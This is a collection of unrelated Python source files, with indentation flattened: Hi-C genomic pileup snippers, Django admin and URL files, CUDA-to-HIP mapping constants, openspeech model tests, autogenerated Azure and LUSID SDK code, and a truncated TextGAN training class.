sel1 = features.chrom == region1[0]
sel1 &= features.end >= region1[1]
if region1[2] is not None:
sel1 &= features.start < region1[2]
sel2 = features.chrom == region2[0]
sel2 &= features.end >= region2[1]
if region2[2] is not None:
sel2 &= features.start < region2[2]
features.loc[(sel1 | sel2), "region"] = i
# off-diagonal features
elif "chrom1" in features.columns:
for i, region in enumerate(supports):
if len(region) == 3:
region1, region2 = region, region
elif len(region) == 2:
region1, region2 = region[0], region[1]
sel1 = features.chrom1 == region1[0]
sel1 &= features.end1 >= region1[1]
if region1[2] is not None:
sel1 &= features.start1 < region1[2]
sel2 = features.chrom2 == region2[0]
sel2 &= features.end2 >= region2[1]
if region2[2] is not None:
sel2 &= features.start2 < region2[2]
features.loc[(sel1 | sel2), "region"] = i
else:
raise ValueError("Could not parse `features` data frame.")
features["region"] = features["region"].map(
lambda i: "{}:{}-{}".format(*supports[int(i)]), na_action="ignore"
)
return features
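# Illustrative usage (assumed inputs): supports given as (chrom, start, end)
# tuples, e.g. chromosome arms; the returned table gains a string 'region' column.
#
#   supports = [("chr1", 0, 123_400_000), ("chr1", 123_400_000, 248_956_422)]
#   features = assign_regions(features, supports)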
def _pileup(data_select, data_snip, arg):
support, feature_group = arg
# check if support region is on- or off-diagonal
if len(support) == 2:
region1, region2 = map(bioframe.region.parse_region_string, support)
else:
region1 = region2 = bioframe.region.parse_region_string(support)
# check if features are on- or off-diagonal
if "start" in feature_group:
s1 = feature_group["start"].values
e1 = feature_group["end"].values
s2, e2 = s1, e1
else:
s1 = feature_group["start1"].values
e1 = feature_group["end1"].values
s2 = feature_group["start2"].values
e2 = feature_group["end2"].values
data = data_select(region1, region2)
stack = list(map(partial(data_snip, data, region1, region2), zip(s1, e1, s2, e2)))
return np.dstack(stack), feature_group["_rank"].values
def pileup(features, data_select, data_snip, map=map):
"""
Handles on-diagonal and off-diagonal cases.
Parameters
----------
features : DataFrame
Table of features. Requires columns ['chrom', 'start', 'end'].
        Or ['chrom1', 'start1', 'end1', 'chrom2', 'start2', 'end2'].
start, end are bp coordinates.
lo, hi are bin coordinates.
data_select : callable
Callable that takes a region as argument and returns
the data, mask and bin offset of a support region
    data_snip : callable
        Callable that takes data, mask and a 2D bin span (lo1, hi1, lo2, hi2)
        and returns a snippet from the selected support region
    map : callable, optional
        Map implementation used to iterate over the per-region feature groups;
        defaults to the built-in ``map``, but a parallel map can be supplied.
    Returns
    -------
    3D array of snippets stacked along the last axis, restored to the original
    feature order.
    """
if features.region.isnull().any():
warnings.warn("Some features do not have regions assigned! Some snips will be empty.")
features = features.copy()
features["_rank"] = range(len(features))
# cumul_stack = []
# orig_rank = []
cumul_stack, orig_rank = zip(
*map(
partial(_pileup, data_select, data_snip),
features.groupby("region", sort=False),
)
)
# Restore the original rank of the input features
cumul_stack = np.dstack(cumul_stack)
orig_rank = np.concatenate(orig_rank)
idx = np.argsort(orig_rank)
cumul_stack = cumul_stack[:, :, idx]
return cumul_stack
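# A minimal usage sketch (assumed objects, not part of this module): `clr` is a
# cooler.Cooler and `features` already carries a 'region' column from
# assign_regions(). The CoolerSnipper defined further below supplies the
# data_select/data_snip callables.
#
#   snipper = CoolerSnipper(clr)
#   stack = pileup(features, snipper.select, snipper.snip)
#   average_snippet = np.nanmean(stack, axis=2)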
def pair_sites(sites, separation, slop):
"""
Create "hand" intervals to the right and to the left of each site.
Then join right hands with left hands to pair sites together.
"""
from bioframe.tools import tsv, bedtools
mids = (sites["start"] + sites["end"]) // 2
left_hand = sites[["chrom"]].copy()
left_hand["start"] = mids - separation - slop
left_hand["end"] = mids - separation + slop
left_hand["site_id"] = left_hand.index
left_hand["direction"] = "L"
left_hand["snip_mid"] = mids
left_hand["snip_strand"] = sites["strand"]
right_hand = sites[["chrom"]].copy()
right_hand["start"] = mids + separation - slop
right_hand["end"] = mids + separation + slop
right_hand["site_id"] = right_hand.index
right_hand["direction"] = "R"
right_hand["snip_mid"] = mids
right_hand["snip_strand"] = sites["strand"]
# ignore out-of-bounds hands
mask = (left_hand["start"] > 0) & (right_hand["start"] > 0)
left_hand = left_hand[mask].copy()
right_hand = right_hand[mask].copy()
# intersect right hands (left anchor site)
# with left hands (right anchor site)
with tsv(right_hand) as R, tsv(left_hand) as L:
out = bedtools.intersect(a=R.name, b=L.name, wa=True, wb=True)
out.columns = [c + "_r" for c in right_hand.columns] + [
c + "_l" for c in left_hand.columns
]
return out
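# Illustrative sketch for pair_sites (hypothetical data; requires bedtools and a
# bioframe version that still provides bioframe.tools.tsv/bedtools). Defining the
# function has no side effects.
def _example_pair_sites():
    import pandas as pd

    sites = pd.DataFrame({
        "chrom": ["chr1", "chr1", "chr1"],
        "start": [100_000, 300_000, 500_000],
        "end": [100_200, 300_200, 500_200],
        "strand": ["+", "-", "+"],
    })
    # pair sites whose midpoints lie ~200 kb apart, allowing 10 kb of slop
    pairs = pair_sites(sites, separation=200_000, slop=10_000)
    return pairs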
class CoolerSnipper:
def __init__(self, clr, cooler_opts=None):
self.clr = clr
self.binsize = self.clr.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault("sparse", True)
def select(self, region1, region2):
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
self._isnan1 = np.isnan(self.clr.bins()["weight"].fetch(region1).values)
self._isnan2 = np.isnan(self.clr.bins()["weight"].fetch(region2).values)
matrix = self.clr.matrix(**self.cooler_opts).fetch(region1, region2)
if self.cooler_opts["sparse"]:
matrix = matrix.tocsr()
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
snippet = np.full((dm, dn), np.nan)
# snippet[pad_bottom:pad_top,
# pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray()
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray().astype('float')
snippet[self._isnan1[lo1:hi1], :] = np.nan
snippet[:, self._isnan2[lo2:hi2]] = np.nan
return snippet
class ObsExpSnipper:
def __init__(self, clr, expected, cooler_opts=None):
self.clr = clr
self.expected = expected
# Detect which columns identify regions in the expected table
columns = expected.columns
assert len(columns) > 0
if "chrom" in columns and "start" in columns and "end" in columns:
self.regions_columns = [
"chrom",
"start",
"end",
] # Chromosome arms encoded by multiple columns
elif "chrom" in columns:
self.regions_columns = [
"chrom"
] # Chromosomes or regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif "region" in columns:
self.regions_columns = [
"region"
] # Regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif len(columns) > 0:
self.regions_columns = columns[
0
] # The first column is treated as the chromosome/region annotation
else:
raise ValueError("Expected dataframe has no columns.")
self.binsize = self.clr.binsize
self.offsets = {}
self.pad = True
self.cooler_opts = {} if cooler_opts is None else cooler_opts
self.cooler_opts.setdefault("sparse", True)
def select(self, region1, region2):
assert region1 == region2, "ObsExpSnipper is implemented for cis contacts only."
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
matrix = self.clr.matrix(**self.cooler_opts).fetch(region1, region2)
if self.cooler_opts["sparse"]:
matrix = matrix.tocsr()
self._isnan1 = np.isnan(self.clr.bins()["weight"].fetch(region1).values)
self._isnan2 = np.isnan(self.clr.bins()["weight"].fetch(region2).values)
gr = self.expected.groupby(self.regions_columns)
self._expected = LazyToeplitz(
gr.get_group(region1)[
"balanced.avg"
]
.values
)
return matrix
def snip(self, matrix, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
m, n = matrix.shape
dm, dn = hi1 - lo1, hi2 - lo2
out_of_bounds = False
pad_left = pad_right = pad_bottom = pad_top = None
if lo1 < 0:
pad_bottom = -lo1
out_of_bounds = True
if lo2 < 0:
pad_left = -lo2
out_of_bounds = True
if hi1 > m:
pad_top = dm - (hi1 - m)
out_of_bounds = True
if hi2 > n:
pad_right = dn - (hi2 - n)
out_of_bounds = True
if out_of_bounds:
i0 = max(lo1, 0)
i1 = min(hi1, m)
j0 = max(lo2, 0)
j1 = min(hi2, n)
return np.full((dm, dn), np.nan)
# snippet[pad_bottom:pad_top,
# pad_left:pad_right] = matrix[i0:i1, j0:j1].toarray()
else:
snippet = matrix[lo1:hi1, lo2:hi2].toarray()
snippet[self._isnan1[lo1:hi1], :] = np.nan
snippet[:, self._isnan2[lo2:hi2]] = np.nan
e = self._expected[lo1:hi1, lo2:hi2]
return snippet / e
class ExpectedSnipper:
def __init__(self, clr, expected):
self.clr = clr
self.expected = expected
# Detect which columns identify regions in the expected table
columns = expected.columns
assert len(columns) > 0
if "chrom" in columns and "start" in columns and "end" in columns:
self.regions_columns = [
"chrom",
"start",
"end",
] # Chromosome arms encoded by multiple columns
elif "chrom" in columns:
self.regions_columns = [
"chrom"
] # Chromosomes or regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif "region" in columns:
self.regions_columns = [
"region"
] # Regions encoded in string mode: "chr3:XXXXXXX-YYYYYYYY"
elif len(columns) > 0:
self.regions_columns = columns[
0
] # The first column is treated as the chromosome/region annotation
else:
raise ValueError("Expected dataframe has no columns.")
try:
for region, group in self.expected.groupby(self.regions_columns):
assert group.shape[0]==np.diff(self.clr.extent(region))[0]
except AssertionError:
raise ValueError("Region shape mismatch between expected and cooler. "
"Are they using the same resolution?")
self.binsize = self.clr.binsize
self.offsets = {}
def select(self, region1, region2):
assert (
region1 == region2
), "ExpectedSnipper is implemented for cis contacts only."
self.offsets[region1] = self.clr.offset(region1) - self.clr.offset(region1[0])
self.offsets[region2] = self.clr.offset(region2) - self.clr.offset(region2[0])
self.m = np.diff(self.clr.extent(region1))
self.n = np.diff(self.clr.extent(region2))
gr = self.expected.groupby(self.regions_columns)
self._expected = LazyToeplitz(
gr.get_group(tuple(region1))[
"balanced.avg"
]
.values
)
return self._expected
def snip(self, exp, region1, region2, tup):
s1, e1, s2, e2 = tup
offset1 = self.offsets[region1]
offset2 = self.offsets[region2]
binsize = self.binsize
lo1, hi1 = (s1 // binsize) - offset1, (e1 // binsize) - offset1
lo2, hi2 = (s2 // binsize) - offset2, (e2 // binsize) - offset2
assert hi1 >= 0
assert hi2 >= 0
dm, dn = hi1 - lo1, hi2 - lo2
if lo1 < 0 or lo2 < 0 or hi1 > self.m or hi2 > self.n:
return np.full((dm, dn), np.nan)
snippet = exp[lo1:hi1, lo2:hi2]
return snippet
|
from django.contrib import admin
from .models import Member,ClusterName,Loan,LoanSchedulePayments,LoanPayment,File
admin.site.register(Member)
admin.site.register(ClusterName)
admin.site.register(Loan)
admin.site.register(LoanSchedulePayments)
admin.site.register(LoanPayment)
admin.site.register(File)
# Register your models here.
|
""" Constants for annotations in the mapping.
The constants defined here are used to annotate the mapping tuples in cuda_to_hip_mappings.py.
They are based on
https://github.com/ROCm-Developer-Tools/HIP/blob/master/hipify-clang/src/Statistics.h
and fall into three categories: 1) type of mapping, 2) API of mapping, 3) unsupported
mapping.
"""
CONV_VERSION = 0
CONV_INIT = 1
CONV_DEVICE = 2
CONV_MEM = 3
CONV_KERN = 4
CONV_COORD_FUNC = 5
CONV_MATH_FUNC = 6
CONV_DEVICE_FUNC = 7
CONV_SPECIAL_FUNC = 8
CONV_STREAM = 9
CONV_EVENT = 10
CONV_OCCUPANCY = 11
CONV_CONTEXT = 12
CONV_PEER = 13
CONV_MODULE = 14
CONV_CACHE = 15
CONV_EXEC = 16
CONV_ERROR = 17
CONV_DEF = 18
CONV_TEX = 19
CONV_GL = 20
CONV_GRAPHICS = 21
CONV_SURFACE = 22
CONV_JIT = 23
CONV_D3D9 = 24
CONV_D3D10 = 25
CONV_D3D11 = 26
CONV_VDPAU = 27
CONV_EGL = 28
CONV_THREAD = 29
CONV_OTHER = 30
CONV_INCLUDE = 31
CONV_INCLUDE_CUDA_MAIN_H = 32
CONV_TYPE = 33
CONV_LITERAL = 34
CONV_NUMERIC_LITERAL = 35
CONV_LAST = 36
API_DRIVER = 37
API_RUNTIME = 38
API_BLAS = 39
API_SPARSE = 40
API_RAND = 41
API_LAST = 42
API_FFT = 43
API_RTC = 44
API_ROCTX = 45
HIP_UNSUPPORTED = 46
API_PYTORCH = 1337
API_CAFFE2 = 1338
API_C10 = 1339
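# Illustrative (hypothetical) example of how these constants annotate entries in
# cuda_to_hip_mappings.py: each CUDA identifier maps to a tuple containing the HIP
# replacement, a type-of-mapping constant, an API constant and, optionally,
# HIP_UNSUPPORTED, e.g.
#   "cudaMalloc": ("hipMalloc", CONV_MEM, API_RUNTIME)
#   "cuCtxCreate": ("hipCtxCreate", CONV_CONTEXT, API_DRIVER)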
|
# -*- coding: utf-8 -*-
"""
@date: 2021/7/20 10:19 PM
@file: __init__.py.py
@author: zj
@description:
"""
|
import unittest
import torch
import logging
from openspeech.models import ListenAttendSpellWithLocationAwareModel, ListenAttendSpellWithLocationAwareConfigs
from openspeech.tokenizers.ksponspeech.character import KsponSpeechCharacterTokenizer
from openspeech.utils import (
DUMMY_INPUTS,
DUMMY_INPUT_LENGTHS,
DUMMY_TARGETS,
DUMMY_TARGET_LENGTHS,
build_dummy_configs,
)
from openspeech.criterion.label_smoothed_cross_entropy.label_smoothed_cross_entropy import (
LabelSmoothedCrossEntropyLossConfigs,
LabelSmoothedCrossEntropyLoss,
)
logger = logging.getLogger(__name__)
class TestListenAttendSpellWithLocationAware(unittest.TestCase):
def test_forward(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
criterion = LabelSmoothedCrossEntropyLoss(configs, num_classes=len(vocab), vocab=vocab)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-04)
for i in range(3):
outputs = model(DUMMY_INPUTS, DUMMY_INPUT_LENGTHS)
loss = criterion(outputs["logits"], DUMMY_TARGETS[:, 1:])
loss.backward()
optimizer.step()
assert type(loss.item()) == float
def test_beam_search(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
model.set_beam_decoder(beam_size=3)
for i in range(3):
prediction = model(DUMMY_INPUTS, DUMMY_INPUT_LENGTHS)["predictions"]
assert isinstance(prediction, torch.Tensor)
def test_training_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.training_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
def test_validation_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.validation_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
def test_test_step(self):
configs = build_dummy_configs(
model_configs=ListenAttendSpellWithLocationAwareConfigs(),
criterion_configs=LabelSmoothedCrossEntropyLossConfigs(),
)
vocab = KsponSpeechCharacterTokenizer(configs)
model = ListenAttendSpellWithLocationAwareModel(configs, vocab)
for i in range(3):
outputs = model.test_step(
batch=(DUMMY_INPUTS, DUMMY_TARGETS, DUMMY_INPUT_LENGTHS, DUMMY_TARGET_LENGTHS), batch_idx=i
)
assert type(outputs["loss"].item()) == float
if __name__ == '__main__':
unittest.main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class PrivateLinkResourcesOperations:
"""PrivateLinkResourcesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2021_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def list_by_storage_account(
self,
resource_group_name: str,
account_name: str,
**kwargs
) -> "_models.PrivateLinkResourceListResult":
"""Gets the private link resources that need to be created for a storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResourceListResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2021_02_01.models.PrivateLinkResourceListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResourceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-02-01"
accept = "application/json"
# Construct URL
url = self.list_by_storage_account.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResourceListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_by_storage_account.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/privateLinkResources'} # type: ignore
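# Minimal usage sketch (hypothetical resource names; assumes the async
# StorageManagementClient from azure.mgmt.storage.aio exposes this operation group
# as the `private_link_resources` attribute):
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.storage.aio import StorageManagementClient
#
#   async def example():
#       async with StorageManagementClient(DefaultAzureCredential(), "<subscription-id>") as client:
#           return await client.private_link_resources.list_by_storage_account(
#               resource_group_name="my-rg", account_name="mystorageacct"
#           )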
|
from django.urls import path
from .views import (Bookmarkarticle,
ListBookmarkedArticles)
app_name = "bookmarks"
urlpatterns = [
path("bookmarks/articles/",
ListBookmarkedArticles.as_view(),
name="view_bookmarked_articles"),
path('articles/<slug>/bookmarks/',
Bookmarkarticle.as_view(), name='bookmark&unbookmark')
]
|
# coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.4425
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class ResourceListOfGetCreditSupportAnnexResponse(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'values': 'list[GetCreditSupportAnnexResponse]',
'href': 'str',
'links': 'list[Link]',
'next_page': 'str',
'previous_page': 'str'
}
attribute_map = {
'values': 'values',
'href': 'href',
'links': 'links',
'next_page': 'nextPage',
'previous_page': 'previousPage'
}
required_map = {
'values': 'required',
'href': 'optional',
'links': 'optional',
'next_page': 'optional',
'previous_page': 'optional'
}
def __init__(self, values=None, href=None, links=None, next_page=None, previous_page=None, local_vars_configuration=None): # noqa: E501
"""ResourceListOfGetCreditSupportAnnexResponse - a model defined in OpenAPI"
:param values: The resources to list. (required)
:type values: list[lusid.GetCreditSupportAnnexResponse]
:param href: The URI of the resource list.
:type href: str
:param links: Collection of links.
:type links: list[lusid.Link]
:param next_page: The next page of results.
:type next_page: str
:param previous_page: The previous page of results.
:type previous_page: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._values = None
self._href = None
self._links = None
self._next_page = None
self._previous_page = None
self.discriminator = None
self.values = values
self.href = href
self.links = links
self.next_page = next_page
self.previous_page = previous_page
@property
def values(self):
"""Gets the values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The resources to list. # noqa: E501
:return: The values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: list[lusid.GetCreditSupportAnnexResponse]
"""
return self._values
@values.setter
def values(self, values):
"""Sets the values of this ResourceListOfGetCreditSupportAnnexResponse.
The resources to list. # noqa: E501
:param values: The values of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type values: list[lusid.GetCreditSupportAnnexResponse]
"""
if self.local_vars_configuration.client_side_validation and values is None: # noqa: E501
raise ValueError("Invalid value for `values`, must not be `None`") # noqa: E501
self._values = values
@property
def href(self):
"""Gets the href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The URI of the resource list. # noqa: E501
:return: The href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._href
@href.setter
def href(self, href):
"""Sets the href of this ResourceListOfGetCreditSupportAnnexResponse.
The URI of the resource list. # noqa: E501
:param href: The href of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type href: str
"""
self._href = href
@property
def links(self):
"""Gets the links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
Collection of links. # noqa: E501
:return: The links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: list[lusid.Link]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this ResourceListOfGetCreditSupportAnnexResponse.
Collection of links. # noqa: E501
:param links: The links of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type links: list[lusid.Link]
"""
self._links = links
@property
def next_page(self):
"""Gets the next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The next page of results. # noqa: E501
:return: The next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._next_page
@next_page.setter
def next_page(self, next_page):
"""Sets the next_page of this ResourceListOfGetCreditSupportAnnexResponse.
The next page of results. # noqa: E501
:param next_page: The next_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type next_page: str
"""
self._next_page = next_page
@property
def previous_page(self):
"""Gets the previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
The previous page of results. # noqa: E501
:return: The previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:rtype: str
"""
return self._previous_page
@previous_page.setter
def previous_page(self, previous_page):
"""Sets the previous_page of this ResourceListOfGetCreditSupportAnnexResponse.
The previous page of results. # noqa: E501
:param previous_page: The previous_page of this ResourceListOfGetCreditSupportAnnexResponse. # noqa: E501
:type previous_page: str
"""
self._previous_page = previous_page
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ResourceListOfGetCreditSupportAnnexResponse):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, ResourceListOfGetCreditSupportAnnexResponse):
return True
return self.to_dict() != other.to_dict()
|
# -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : instructor.py
# @Time : Created at 2019-04-25
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import torch
import torch.nn as nn
import config as cfg
from utils.data_loader import GenDataIter
from utils.helpers import Signal, create_logger
from utils.text_process import load_dict, write_tokens, tensor_to_tokens
class BasicInstructor:
def __init__(self, opt):
self.log = create_logger(__name__, silent=False, to_disk=True,
log_file=cfg.log_filename if cfg.if_test
else [cfg.log_filename, cfg.save_root + 'log.txt'])
self.sig = Signal(cfg.signal_file)
self.opt = opt
self.show_config()
# load dictionary
self.word_index_dict, self.index_word_dict = load_dict(cfg.dataset)
# Dataloader
self.train_data = GenDataIter(cfg.train_data)
self.test_data = GenDataIter(cfg.test_data, if_test_data=True)
self.gen_data = None
# Criterion
self.mle_criterion = nn.NLLLoss()
self.dis_criterion = None
self.bleu = None
self.self_bleu = None
def _run(self):
print('Nothing to run in Basic Instructor!')
pass
def _test(self):
pass
def init_model(self):
if cfg.dis_pretrain:
self.log.info(
'Load pretrain_generator discriminator: {}'.format(cfg.pretrained_dis_path))
self.dis.load_state_dict(torch.load(cfg.pretrained_dis_path))
if cfg.gen_pretrain:
self.log.info('Load MLE pretrain_generator gen: {}'.format(cfg.pretrained_gen_path))
self.gen.load_state_dict(torch.load(cfg.pretrained_gen_path))
if cfg.CUDA:
self.gen = self.gen.cuda()
self.dis = self.dis.cuda()
def train_gen_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size)
pred = model.forward(inp, hidden)
loss = criterion(pred, target.view(-1))
self.optimize(optimizer, loss, model)
total_loss += loss.item()
return total_loss / len(data_loader)
def train_dis_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
total_acc = 0
total_num = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
self.optimize(optimizer, loss, model)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def eval_gen(model, data_loader, criterion):
total_loss = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size)
pred = model.forward(inp, hidden)
loss = criterion(pred, target.view(-1))
total_loss += loss.item()
return total_loss / len(data_loader)
@staticmethod
def eval_dis(model, data_loader, criterion):
total_loss = 0
total_acc = 0
total_num = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
